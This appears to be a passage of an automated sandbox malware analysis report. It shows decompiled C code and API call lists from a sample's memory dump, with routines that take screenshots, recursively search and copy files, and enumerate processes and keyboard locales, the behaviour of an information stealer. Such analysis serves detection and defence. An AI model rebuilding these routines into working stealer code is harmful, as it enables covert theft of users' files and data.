                                                                    • DeleteObject.GDI32(00000000), ref: 00416842
                                                                    • ReleaseDC.USER32(00000000,?), ref: 0041684C
                                                                    • CloseWindow.USER32(00000000), ref: 00416853
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Object$Window$CompatibleCreateDeleteGlobalSelect$BitmapCloseDesktopRectReleaseSize
                                                                    • String ID: \screenshot.jpg
                                                                    • API String ID: 527014841-3844582059
                                                                    • Opcode ID: f6728a3a4a2e7bb19a1c90d60e336044d0564f73320422b4ca5a619c80478f71
                                                                    • Instruction ID: c39ea76d3917f63f8044a0ac1e8f906f23aba1cd166b36e8cb092cada6b9df5f
                                                                    • Opcode Fuzzy Hash: f6728a3a4a2e7bb19a1c90d60e336044d0564f73320422b4ca5a619c80478f71
                                                                    • Instruction Fuzzy Hash: 3741F676900208BFDF11AFE4ED489EEBF7DFF0A711B110029F606E2120D73499559B6A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00411117 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 120filestringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E00411117(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, char* _a12) {
				signed int _v12;
				char _v280;
				char _v544;
				char _v808;
				char _v1808;
				struct _WIN32_FIND_DATAA _v2128;
				intOrPtr _v2132;
				void* _v2136;
				char* _v2140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				int _t42;
				void* _t53;
				char* _t62;
				CHAR* _t73;
				void* _t78;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t83;
				void* _t84;
				void* _t85;
				void* _t86;

				_t80 = __edx;
				_t35 =  *0x443674; // 0x393162b1
				_v12 = _t35 ^ _t83;
				_t82 = _a8;
				_t81 = _a4;
				_v2140 = _a12;
				_v2132 = __ecx;
				wsprintfA( &_v808, "%s\\*", _t82);
				_t85 = _t84 + 0xc;
				_t42 = FindFirstFileA( &_v808,  &_v2128);
				_v2136 = _t42;
				if(_t42 != 0xffffffff) {
					_t73 = "%s\\%s";
					do {
						_push(".");
						_push( &(_v2128.cFileName));
						if( *0x446458() != 0) {
							_push("..");
							_push( &(_v2128.cFileName));
							if( *0x446458() != 0) {
								wsprintfA( &_v544, _t73, _t82,  &(_v2128.cFileName));
								_t86 = _t85 + 0x10;
								_t53 =  *0x446458(_t81, 0x43c8d8);
								_push( &(_v2128.cFileName));
								if(_t53 != 0) {
									wsprintfA( &_v280, _t73, _t81);
									_t85 = _t86 + 0x10;
								} else {
									wsprintfA( &_v280, "%s");
									_t85 = _t86 + 0xc;
								}
								if(PathMatchSpecA( &(_v2128.cFileName), _v2140) != 0) {
									_t78 = 0x3e8;
									_t62 =  &_v1808;
									do {
										 *_t62 = 0;
										_t62 = _t62 + 1;
										_t78 = _t78 - 1;
									} while (_t78 != 0);
									lstrcatA( &_v1808,  *0x445ce4);
									lstrcatA( &_v1808,  &_v280);
									E0041CE7C( *((intOrPtr*)(_v2132 + 0x20)),  &_v1808, 0, 2);
									_t85 = _t85 + 0xc;
								}
								E00411117(_v2132, _t80,  &_v280,  &_v544, _v2140);
							}
						}
					} while (FindNextFileA(_v2136,  &_v2128) != 0);
					_t42 = FindClose(_v2136);
				}
				return E0041DA9B(_t42, _t73, _v12 ^ _t83, _t80, _t81, _t82);
			}




























                                                                    0x00411117
                                                                    0x00411120
                                                                    0x00411127
                                                                    0x0041112f
                                                                    0x00411133
                                                                    0x00411137
                                                                    0x00411149
                                                                    0x0041114f
                                                                    0x00411155
                                                                    0x00411166
                                                                    0x0041116c
                                                                    0x00411175
                                                                    0x0041117b
                                                                    0x00411180
                                                                    0x00411180
                                                                    0x0041118b
                                                                    0x00411194
                                                                    0x0041119a
                                                                    0x004111a5
                                                                    0x004111ae
                                                                    0x004111c4
                                                                    0x004111ca
                                                                    0x004111d3
                                                                    0x004111e1
                                                                    0x004111e8
                                                                    0x004111fe
                                                                    0x00411204
                                                                    0x004111ea
                                                                    0x004111f0
                                                                    0x004111f6
                                                                    0x004111f6
                                                                    0x0041121c
                                                                    0x0041121e
                                                                    0x00411223
                                                                    0x00411229
                                                                    0x00411229
                                                                    0x0041122c
                                                                    0x0041122d
                                                                    0x0041122d
                                                                    0x0041123d
                                                                    0x00411251
                                                                    0x00411271
                                                                    0x00411276
                                                                    0x00411276
                                                                    0x00411293
                                                                    0x00411293
                                                                    0x004111ae
                                                                    0x004112ab
                                                                    0x004112b9
                                                                    0x004112b9
                                                                    0x004112cd

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: wsprintf$Find$Filelstrcat$CloseFirstMatchNextPathSpec
                                                                    • String ID: %s\%s$%s\*
                                                                    • API String ID: 3375986482-2848263008
                                                                    • Opcode ID: 9ac857b251d21aab175aa0b9588577910a50320045fe88e55300eb9c087c5f16
                                                                    • Instruction ID: 71d4b98c3729e101340706fa9899053da89462c958fedec868a107e351819c4e
                                                                    • Opcode Fuzzy Hash: 9ac857b251d21aab175aa0b9588577910a50320045fe88e55300eb9c087c5f16
                                                                    • Instruction Fuzzy Hash: B1412E7590021CABCF11EB64DC49FDAB7BCFB0A305F0445EAE649E2151DA34AA848F99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041048F Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 135fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 25%
                                                                    			E0041048F(intOrPtr __ecx, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v276;
				char _v540;
				struct _WIN32_FIND_DATAA _v860;
				CHAR* _v864;
				CHAR* _v868;
				void* _v872;
				intOrPtr _v876;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				CHAR* _t44;
				int _t49;
				void* _t67;
				intOrPtr _t76;
				intOrPtr _t89;
				CHAR* _t90;
				signed int _t91;
				void* _t92;
				void* _t93;

				_t41 =  *0x443674; // 0x393162b1
				_v8 = _t41 ^ _t91;
				_t90 = _a12;
				_t89 = _a16;
				_v868 = _a4;
				_t44 = _a8;
				_v864 = _t44;
				_t76 = __ecx;
				_v876 = __ecx;
				wsprintfA( &_v540, "%s\\*", _t44);
				_t93 = _t92 + 0xc;
				_t49 = FindFirstFileA( &_v540,  &_v860);
				_v872 = _t49;
				if(_t49 == 0xffffffff) {
					L18:
					return E0041DA9B(_t49, _t76, _v8 ^ _t91, _t88, _t89, _t90);
				} else {
					goto L1;
				}
				do {
					L1:
					_push(".");
					_push( &(_v860.cFileName));
					if( *0x446458() == 0) {
						goto L16;
					}
					_push("..");
					_push( &(_v860.cFileName));
					if( *0x446458() == 0) {
						goto L16;
					}
					wsprintfA( &_v276, "%s\\%s", _v864,  &(_v860.cFileName));
					_t93 = _t93 + 0x10;
					_push( *0x445ec0);
					_push( &(_v860.cFileName));
					if( *0x446458() != 0) {
						_push( *0x445a68);
						_push( &(_v860.cFileName));
						if( *0x446458() != 0) {
							_push( *0x4461d8);
							_push( &(_v860.cFileName));
							if( *0x446458() != 0) {
								_t67 =  *0x446458( &(_v860.cFileName),  *0x445ad4);
								if(_t67 != 0) {
									if((_v860.dwFileAttributes & 0x00000010) == 0) {
										goto L16;
									}
									L15:
									E0041048F(_t76,  &(_v860.cFileName),  &_v276, _t90, _t89);
									goto L16;
								}
								if( *((intOrPtr*)(_t76 + 2)) != _t67) {
									E0040FE87( &_v276, _v868, _t90, _t89);
									_t76 = _v876;
									_t93 = _t93 + 0xc;
								}
								goto L15;
							}
							_push(_v864);
							if( *0x446234() != 0) {
								goto L15;
							}
							_push(_t90);
							E0040F878(_v864, _t88);
							L5:
							goto L15;
						}
						E0041001C( &_v276, _v868, _t90, _t89);
						_t93 = _t93 + 0xc;
						goto L15;
					}
					_t88 = _v868;
					E0040FB18( &_v276, _v868, _t90, _t89);
					goto L5;
					L16:
				} while (FindNextFileA(_v872,  &_v860) != 0);
				_t49 = FindClose(_v872);
				goto L18;
			}
























                                                                    0x00410498
                                                                    0x0041049f
                                                                    0x004104a7
                                                                    0x004104ab
                                                                    0x004104ae
                                                                    0x004104b4
                                                                    0x004104b8
                                                                    0x004104c4
                                                                    0x004104cc
                                                                    0x004104d2
                                                                    0x004104d8
                                                                    0x004104e9
                                                                    0x004104ef
                                                                    0x004104f8
                                                                    0x0041066b
                                                                    0x00410679
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004104fe
                                                                    0x004104fe
                                                                    0x004104fe
                                                                    0x00410509
                                                                    0x00410512
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00410518
                                                                    0x00410523
                                                                    0x0041052c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041054b
                                                                    0x00410551
                                                                    0x00410554
                                                                    0x00410560
                                                                    0x00410569
                                                                    0x00410585
                                                                    0x00410591
                                                                    0x0041059a
                                                                    0x004105b4
                                                                    0x004105c0
                                                                    0x004105c9
                                                                    0x004105f7
                                                                    0x004105ff
                                                                    0x0041062b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041062d
                                                                    0x0041063f
                                                                    0x00000000
                                                                    0x0041063f
                                                                    0x00410604
                                                                    0x00410614
                                                                    0x00410619
                                                                    0x0041061f
                                                                    0x0041061f
                                                                    0x00000000
                                                                    0x00410604
                                                                    0x004105cb
                                                                    0x004105da
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004105e2
                                                                    0x004105e3
                                                                    0x0041057f
                                                                    0x00000000
                                                                    0x0041057f
                                                                    0x004105aa
                                                                    0x004105af
                                                                    0x00000000
                                                                    0x004105af
                                                                    0x0041056b
                                                                    0x00410579
                                                                    0x00000000
                                                                    0x00410644
                                                                    0x00410657
                                                                    0x00410665
                                                                    0x00000000

                                                                    APIs
                                                                    • wsprintfA.USER32 ref: 004104D2
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004104E9
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 0041050A
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00410524
                                                                    • wsprintfA.USER32 ref: 0041054B
                                                                    • StrCmpCA.SHLWAPI(?), ref: 00410561
                                                                    • StrCmpCA.SHLWAPI(?), ref: 00410592
                                                                      • Part of subcall function 0040FB18: _memset.LIBCMT ref: 0040FB53
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,004132CB,0043C8D8,?), ref: 0040FB68
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,00000000), ref: 0040FB7E
                                                                      • Part of subcall function 0040FB18: CopyFileA.KERNEL32(?,?,00000001), ref: 0040FB8E
                                                                      • Part of subcall function 0040FB18: _memset.LIBCMT ref: 0040FB9F
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,0043C8E0), ref: 0040FBB4
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?), ref: 0040FBC7
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,0043C8E0), ref: 0040FBD5
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,?), ref: 0040FBE8
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,0043F090), ref: 0040FBFA
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,?), ref: 0040FC08
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,.txt), ref: 0040FC1A
                                                                      • Part of subcall function 0040FB18: GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040FC6C
                                                                      • Part of subcall function 0040FB18: HeapAlloc.KERNEL32(00000000), ref: 0040FC73
                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00410651
                                                                    • FindClose.KERNEL32(?), ref: 00410665
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileFind$Heap_memsetwsprintf$AllocCloseCopyFirstNextProcess
                                                                    • String ID: %s\%s$%s\*
                                                                    • API String ID: 1524811457-2848263008
                                                                    • Opcode ID: 975b028da7206236778b1ab5de5829895a91347a30c8addd8f54e00f02ad0e7c
                                                                    • Instruction ID: efe4cf5bec2eb240efd75cd6a1a133d8a1522e46aa05a8509384cd33b717e5c8
                                                                    • Opcode Fuzzy Hash: 975b028da7206236778b1ab5de5829895a91347a30c8addd8f54e00f02ad0e7c
                                                                    • Instruction Fuzzy Hash: 80517A7190021DABCF22EF61DC45EDA7BBCBB4A314F0444A6E509E2160DB749BD4CF19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041593C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 78memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 75%
                                                                    			E0041593C() {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				int _t24;
				int _t27;
				void* _t40;
				void* _t41;
				void* _t44;
				signed int _t46;
				void* _t47;
				void* _t50;
				signed int _t52;
				void* _t54;
				void* _t55;
				void* _t57;

				_t52 = _t54 - 0x190;
				_t55 = _t54 - 0x210;
				_t20 =  *0x443674; // 0x393162b1
				 *(_t52 + 0x18c) = _t20 ^ _t52;
				_t46 = 0;
				 *(_t52 - 0x78) = HeapAlloc(GetProcessHeap(), 0, 0x1f4);
				 *((intOrPtr*)(_t52 - 0x7c)) = 0;
				_t24 = GetKeyboardLayoutList(0, 0);
				_t40 = LocalAlloc(0x40, _t24 << 2);
				_t27 = GetKeyboardLayoutList(_t24, _t40);
				 *(_t52 - 0x80) = _t27;
				if(_t27 != 0) {
					do {
						GetLocaleInfoA( *(_t40 + _t46 * 4) & 0x0000ffff, 2, _t52 - 0x74, 0x200);
						_push(_t52 - 0x74);
						if( *((intOrPtr*)(_t52 - 0x7c)) == 0) {
							wsprintfA( *(_t52 - 0x78), "%s");
							_t57 = _t55 + 0xc;
						} else {
							_push( *(_t52 - 0x78));
							wsprintfA( *(_t52 - 0x78), "%s / %s");
							_t57 = _t55 + 0x10;
						}
						 *((intOrPtr*)(_t52 - 0x7c)) =  *((intOrPtr*)(_t52 - 0x7c)) + 1;
						E00426300(_t52 - 0x74, 0, 0x200);
						_t55 = _t57 + 0xc;
						_t46 = _t46 + 1;
					} while (_t46 <  *(_t52 - 0x80));
				}
				if(_t40 != 0) {
					LocalFree(_t40);
				}
				_pop(_t47);
				_pop(_t50);
				_pop(_t41);
				return E0041DA9B( *(_t52 - 0x78), _t41,  *(_t52 + 0x18c) ^ _t52, _t44, _t47, _t50);
			}



















                                                                    0x0041593d
                                                                    0x00415944
                                                                    0x0041594a
                                                                    0x00415951
                                                                    0x0041595f
                                                                    0x00415971
                                                                    0x00415974
                                                                    0x00415977
                                                                    0x0041598b
                                                                    0x0041598f
                                                                    0x00415995
                                                                    0x0041599a
                                                                    0x004159a1
                                                                    0x004159ad
                                                                    0x004159ba
                                                                    0x004159bb
                                                                    0x004159db
                                                                    0x004159e1
                                                                    0x004159bd
                                                                    0x004159bd
                                                                    0x004159c8
                                                                    0x004159ce
                                                                    0x004159ce
                                                                    0x004159e4
                                                                    0x004159ee
                                                                    0x004159f3
                                                                    0x004159f6
                                                                    0x004159f7
                                                                    0x004159a1
                                                                    0x004159fe
                                                                    0x00415a01
                                                                    0x00415a01
                                                                    0x00415a10
                                                                    0x00415a11
                                                                    0x00415a14
                                                                    0x00415a21

                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000000,000001F4,00000000,0043C8DC,00000000), ref: 00415962
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00415969
                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00415977
                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00415985
                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0041598F
                                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004159AD
                                                                    • wsprintfA.USER32 ref: 004159C8
                                                                    • wsprintfA.USER32 ref: 004159DB
                                                                    • _memset.LIBCMT ref: 004159EE
                                                                    • LocalFree.KERNEL32(00000000), ref: 00415A01
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocHeapKeyboardLayoutListLocalwsprintf$FreeInfoLocaleProcess_memset
                                                                    • String ID: %s / %s
                                                                    • API String ID: 2849719339-2910687431
                                                                    • Opcode ID: 20cfd44a24f21baeb74b6d7a0a39def26dc5ba0bf7a2f973d3dfa5853cf7acf9
                                                                    • Instruction ID: d84ff11409299512e8b233a12289bc073feddbd73ff054decb92e3fca7afa228
                                                                    • Opcode Fuzzy Hash: 20cfd44a24f21baeb74b6d7a0a39def26dc5ba0bf7a2f973d3dfa5853cf7acf9
                                                                    • Instruction Fuzzy Hash: 7F2191B5900208EBDB209FB5EC49EEE7B78FB4A305F21003AF911E2152D7745944CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00415A22 Relevance: 15.1, APIs: 10, Instructions: 53stringprocessCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E00415A22(void* __ebx, void* __edx, void* __edi, CHAR* __esi, void* __eflags) {
				CHAR* _t26;
				void* _t33;
				void* _t35;
				CHAR* _t36;
				void* _t37;

				_t36 = __esi;
				_t33 = __edx;
				_t30 = __ebx;
				_push(0x14c);
				E0042083E(E004345F1, __ebx, __edi, __esi);
				 *(_t37 - 0x158) = 0x128;
				_t35 = CreateToolhelp32Snapshot(2, 0);
				if(Process32First(_t35, _t37 - 0x158) != 0) {
					while(Process32Next(_t35, _t37 - 0x158) != 0) {
						lstrcatA(_t36, "- ");
						lstrcatA(_t36, _t37 - 0x134);
						lstrcatA(_t36, " [");
						_push( *((intOrPtr*)(_t37 - 0x150)));
						_t26 = E00415F45(_t30, _t37 - 0x2c, _t33, _t35, _t36, __eflags);
						 *(_t37 - 4) =  *(_t37 - 4) & 0x00000000;
						__eflags = _t26[0x14] - 0x10;
						if(_t26[0x14] >= 0x10) {
							_t26 =  *_t26;
						}
						lstrcatA(_t36, _t26);
						_t9 = _t37 - 4;
						 *_t9 =  *(_t37 - 4) | 0xffffffff;
						__eflags =  *_t9;
						E00404354(_t37 - 0x2c, 1, 0);
						lstrcatA(_t36, "]\n");
					}
				}
				CloseHandle(_t35);
				return E00420888(_t30, _t35, _t36);
			}








                                                                    0x00415a22
                                                                    0x00415a22
                                                                    0x00415a22
                                                                    0x00415a22
                                                                    0x00415a2c
                                                                    0x00415a35
                                                                    0x00415a45
                                                                    0x00415a57
                                                                    0x00415abf
                                                                    0x00415a61
                                                                    0x00415a6f
                                                                    0x00415a7b
                                                                    0x00415a81
                                                                    0x00415a8a
                                                                    0x00415a8f
                                                                    0x00415a93
                                                                    0x00415a97
                                                                    0x00415a99
                                                                    0x00415a99
                                                                    0x00415a9d
                                                                    0x00415aa3
                                                                    0x00415aa3
                                                                    0x00415aa3
                                                                    0x00415aae
                                                                    0x00415ab9
                                                                    0x00415ab9
                                                                    0x00415abf
                                                                    0x00415ad2
                                                                    0x00415add

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00415A2C
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415A3F
                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 00415A4F
                                                                    • lstrcatA.KERNEL32(?,0043F544), ref: 00415A61
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415A6F
                                                                    • lstrcatA.KERNEL32(?,0043EC94), ref: 00415A7B
                                                                    • lstrcatA.KERNEL32(?,00000000,?), ref: 00415A9D
                                                                    • lstrcatA.KERNEL32(?,0043EC98,00000001,00000000), ref: 00415AB9
                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00415AC7
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00415AD2
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$Process32$CloseCreateFirstH_prolog3_HandleNextSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 4202092735-0
                                                                    • Opcode ID: 76ef1b5bd33c02a3f490de90ab32f3375581ee919b702102ce2506128cc86233
                                                                    • Instruction ID: 75e5ab016ba9d0325d5b1fc38600bbf14b35468b598a44f2275c61a8cb821180
                                                                    • Opcode Fuzzy Hash: 76ef1b5bd33c02a3f490de90ab32f3375581ee919b702102ce2506128cc86233
                                                                    • Instruction Fuzzy Hash: DF11BF30541514EFDB00AF60DC49FEE7B38AF4B751F200065F101A61E0CB784A898B6E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040781A Relevance: 14.4, APIs: 3, Strings: 5, Instructions: 399timeCOMMONCrypto
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 89%
                                                                    			E0040781A(void* __ebx, void* __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v12;
				char _v280;
				char _v544;
				struct _SYSTEMTIME _v560;
				signed char _v561;
				signed char _v562;
				signed char _v563;
				signed int _v564;
				void* _v568;
				signed int _v572;
				char _v576;
				struct _FILETIME _v584;
				char _v586;
				char _v587;
				char _v588;
				struct _FILETIME _v596;
				struct _FILETIME _v604;
				unsigned int _v636;
				intOrPtr _v660;
				intOrPtr _v664;
				unsigned int _v672;
				unsigned int _v688;
				void* __edi;
				void* __esi;
				signed int _t162;
				intOrPtr _t164;
				void* _t165;
				signed int _t173;
				void* _t175;
				signed int _t177;
				void* _t178;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t191;
				unsigned int _t203;
				long _t215;
				void* _t217;
				signed char _t222;
				long _t239;
				long _t247;
				signed int _t250;
				void _t255;
				void* _t262;
				void _t266;
				void _t267;
				signed int _t271;
				unsigned int _t280;
				signed int _t282;
				unsigned int _t284;
				signed int _t291;
				signed int _t292;
				signed char* _t303;
				signed int _t311;
				signed char _t317;
				signed int _t326;
				signed int _t327;
				intOrPtr* _t338;
				signed int _t340;
				signed int _t342;
				signed int _t347;

				_t313 = __edx;
				_t262 = __ebx;
				_t162 =  *0x443674; // 0x393162b1
				_v12 = _t162 ^ _t347;
				_t164 = _a4;
				_t337 = __ecx;
				_v568 = __ecx;
				if(_t164 < 0xffffffff) {
					L64:
					_t165 = 0x10000;
					L65:
					return E0041DA9B(_t165, _t262, _v12 ^ _t347, _t313, _t328, _t337);
				}
				_t328 =  *__ecx;
				if(_t164 >=  *((intOrPtr*)( *__ecx + 4))) {
					goto L64;
				}
				if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
					E0040772D(_t328);
					_t164 = _a4;
				}
				 *(_t337 + 4) =  *(_t337 + 4) | 0xffffffff;
				if(_t164 !=  *((intOrPtr*)(_t337 + 0x134))) {
					__eflags = _t164 - 0xffffffff;
					if(_t164 != 0xffffffff) {
						_t266 =  *_t337;
						__eflags = _t164 -  *((intOrPtr*)(_t266 + 0x10));
						if(_t164 <  *((intOrPtr*)(_t266 + 0x10))) {
							E00407035(_t266);
							_t337 = _v568;
							_t164 = _a4;
						}
						_t267 =  *_t337;
						__eflags =  *((intOrPtr*)(_t267 + 0x10)) - _t164;
						if( *((intOrPtr*)(_t267 + 0x10)) >= _t164) {
							L14:
							_t328 = 0x104;
							E00406E12( *_t337,  &_v688, 0,  &_v280, 0x104);
							_t173 = E004071E7(__eflags,  *_t337,  &_v572,  &(_v584.dwHighDateTime),  &_v576);
							__eflags = _t173;
							if(_t173 == 0) {
								_t313 = _v584.dwHighDateTime;
								_t175 =  *( *_t337);
								_t337 = 0;
								__eflags = E004069C3(_t175, _v584.dwHighDateTime, 0);
								if(__eflags == 0) {
									_t177 = E0041D05B(_t262, _t313, 0x104, 0, __eflags, _v576);
									_t337 =  *( *_v568);
									_v572 = _t177;
									_t178 = E00406A22( *( *_v568), _t177, 1, _v576);
									__eflags = _t178 - _v576;
									if(_t178 == _v576) {
										 *_t262 =  *( *_v568 + 0x10);
										_t182 = 0;
										__eflags = 0;
										do {
											_t271 =  *((intOrPtr*)(_t347 + _t182 - 0x114));
											 *((char*)(_t347 + _t182 - 0x21c)) = _t271;
											_t182 = _t182 + 1;
											__eflags = _t271;
										} while (_t271 != 0);
										_t338 =  &_v544;
										while(1) {
											_t183 =  *_t338;
											__eflags = _t183;
											if(_t183 == 0) {
												break;
											}
											L24:
											__eflags =  *((char*)(_t338 + 1)) - 0x3a;
											if( *((char*)(_t338 + 1)) != 0x3a) {
												goto L26;
											}
											_t338 = _t338 + 2;
											while(1) {
												_t183 =  *_t338;
												__eflags = _t183;
												if(_t183 == 0) {
													break;
												}
												goto L24;
											}
											L26:
											__eflags = _t183 - 0x5c;
											if(_t183 == 0x5c) {
												L28:
												_t338 = _t338 + 1;
												while(1) {
													_t183 =  *_t338;
													__eflags = _t183;
													if(_t183 == 0) {
														break;
													}
													goto L24;
												}
												goto L26;
											}
											__eflags = _t183 - 0x2f;
											if(_t183 != 0x2f) {
												_t184 = E0041E5AB(_t338, "\\..\\");
												__eflags = _t184;
												if(_t184 != 0) {
													L33:
													_t50 = _t184 + 4; // 0x4
													_t338 = _t50;
													continue;
												}
												_t184 = E0041E5AB(_t338, "\\../");
												__eflags = _t184;
												if(_t184 != 0) {
													goto L33;
												}
												_t184 = E0041E5AB(_t338, "/../");
												__eflags = _t184;
												if(_t184 != 0) {
													goto L33;
												}
												_t184 = E0041E5AB(_t338, "/..\\");
												__eflags = _t184;
												if(_t184 == 0) {
													E0041E427(_t262 + 4, _t338, _t328);
													_t280 = _v636;
													_v563 = _t280 >> 0x0000001e & 0x00000001;
													_t191 = _v688 >> 8;
													_t317 =  !(_t280 >> 0x17) & 0x00000001;
													_v562 = 0;
													_v561 = 0;
													_v564 = 1;
													__eflags = _t191;
													if(_t191 == 0) {
														L38:
														_v562 = _t280 >> 0x00000001 & 0x00000001;
														_v561 = _t280 >> 0x00000002 & 0x00000001;
														_t317 = _t280 & 0x00000001;
														_t282 = _t280 >> 0x00000005 & 0x00000001;
														__eflags = _t282;
														_v563 = _t280 >> 0x00000004 & 0x00000001;
														_v564 = _t282;
														L39:
														 *(_t262 + 0x108) =  *(_t262 + 0x108) & 0x00000000;
														__eflags = _v563;
														if(_v563 != 0) {
															 *(_t262 + 0x108) = 0x10;
														}
														__eflags = _v564;
														if(_v564 != 0) {
															_t67 = _t262 + 0x108;
															 *_t67 =  *(_t262 + 0x108) | 0x00000020;
															__eflags =  *_t67;
														}
														__eflags = _v562;
														if(_v562 != 0) {
															_t70 = _t262 + 0x108;
															 *_t70 =  *(_t262 + 0x108) | 0x00000002;
															__eflags =  *_t70;
														}
														__eflags = _t317;
														if(_t317 != 0) {
															_t72 = _t262 + 0x108;
															 *_t72 =  *(_t262 + 0x108) | 0x00000001;
															__eflags =  *_t72;
														}
														__eflags = _v561;
														if(_v561 != 0) {
															_t75 = _t262 + 0x108;
															 *_t75 =  *(_t262 + 0x108) | 0x00000004;
															__eflags =  *_t75;
														}
														 *((intOrPtr*)(_t262 + 0x124)) = _v664;
														 *((intOrPtr*)(_t262 + 0x128)) = _v660;
														_t203 = _v672;
														_t284 = _t203 >> 0x10;
														_v560.wYear = (_t284 >> 9) + 0x7bc;
														_v560.wDay = _t284 & 0x0000001f;
														_v560.wHour = _t203 >> 0xb;
														_v560.wSecond = (_t203 & 0x0000001f) + (_t203 & 0x0000001f);
														_v560.wMilliseconds = 0;
														_v560.wMonth = _t284 >> 0x00000005 & 0x0000000f;
														_v560.wMinute = _t203 >> 0x00000005 & 0x0000003f;
														SystemTimeToFileTime( &_v560,  &_v584);
														_v604.dwLowDateTime = _v584.dwLowDateTime;
														_v604.dwHighDateTime = _v584.dwHighDateTime;
														LocalFileTimeToFileTime( &_v604,  &_v596);
														_t215 = _v596.dwLowDateTime;
														_t291 = _v596.dwHighDateTime;
														_t313 = 0;
														__eflags = _v576 - 4;
														 *(_t262 + 0x10c) = _t215;
														 *(_t262 + 0x110) = _t291;
														 *(_t262 + 0x114) = _t215;
														 *(_t262 + 0x118) = _t291;
														 *(_t262 + 0x11c) = _t215;
														 *(_t262 + 0x120) = _t291;
														if(_v576 <= 4) {
															L61:
															__eflags = _v572;
															if(_v572 != 0) {
																_push(_v572);
																E0041E5C2();
															}
															_t292 = 0x4b;
															_t337 = _t262;
